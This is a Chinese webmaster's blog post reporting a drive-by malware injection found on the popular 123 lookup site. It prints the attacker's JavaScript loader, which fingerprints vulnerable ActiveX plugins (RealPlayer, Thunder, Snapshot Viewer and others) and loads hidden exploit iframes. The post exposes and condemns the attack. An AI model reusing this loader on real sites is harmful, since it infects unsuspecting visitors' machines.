hkseo

        現在是凌晨2點45分，作為一個草根站長的我還沒有睡覺，應該凡是鐵桿站長的應該現在都還沒睡吧(廢話)!

　　本來是要查自己剛註冊的一個小遊戲的網站域名解析是否生效了，所以就到123查詢網查詢了一下，結果令我吃驚的是出現的一片亂碼，難道是我輸入的網址輸錯了?結果仔細一看並沒有輸錯啊。再查看一下代碼，結果令我大吃一驚，PHP編寫的123查詢網居然被掛馬了，難道除了ASP現在連PHP也不安全了嗎?以我分析的話按理說123查詢網流量這麼大，在國內也算是數得著的一流站點了，怎麼會出現這樣的情況,難道是服務器安全問題嗎?還是黑客找到了新的PHP漏洞?一連串的問題出現在我的腦海中!

　　123查詢網被掛的是什麼馬?是哪位高人掛的啊，看了下代碼被插入的馬調用的(為了不讓大家打開網頁，害怕有毒，所以吧域名加了個*)nima12*.cn/zz.htm?a005 再打開這個頁面後又是一個調用laoda123*.cn/web.htm，這個頁面裡的代碼如下：

        <script>
        document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
        document.write("<iframe width=100 height=0 src=xx.htm></iframe>");
        window.status="完成";
        window.onerror=function(){return true;}
        if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
        document.write("<iframe width=100 height=0 src=Ms06014.htm></iframe>");
        try{var m;
        var hw=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
        catch(m){};                     
        finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0

        src=office.htm></iframe>");}}
        try{var n;
        var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
        catch(n){};                     
        finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0

         src=UU.htm></iframe>");}}
         try{var b;
        var ml=new ActiveXObject("DPClient.Vod");}
        catch(b){};                     
        finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 

        src=Thunder.htm></iframe>");}}
        try{var f;
        var gw=new ActiveXObject("GLIEDown.IEDown.1");}
        catch(f){};                     
        finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0

        src=lz.htm></iframe>");}}
        function test()
        {
        rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
        try
        {
        Like = new ActiveXObject(rrooxx);
        }catch(error){return;}
        vvvvv = Like.PlayerProperty("PRODUCTVERSION");
        if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
        document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
        else
        document.write("<iframe width=100 height=0 src=Real11.htm></iframe>");
        }
        test();
        document.write("");
        </script>
 

        連環調用了好幾個頁面，估計是為了刷流量吧，或者有插件？123查詢網的流量如此巨大，確實給黑客帶去了不少東西呵呵。

        現在是凌晨3點40分，123查詢網的站長還沒做出反應，可能是不知道自己的站點除了問題，也可能是在積極調整服務器！

        我個人感覺大家都是中國人，兔子不吃窩邊草，為什麼有的高手非要破壞別人的網站呢？真誠的希望高手們一致對外，真的要搞破壞也不要拿自己人開刀！當然我說這句話可能有的黑客高手要不高興了，不過我說的是實話，還希望各位高手下手之前先想一想，如果是自己的網站被黑了是什麼感覺呢？讓我們共同為中國的網絡事業做出點貢獻不好麼？不要再讓國外的一些人渣瞧不起了！

        在此祝你早日修復123查詢網，因為我一直在用，應該是好多人都在用，希望貴站越辦越好！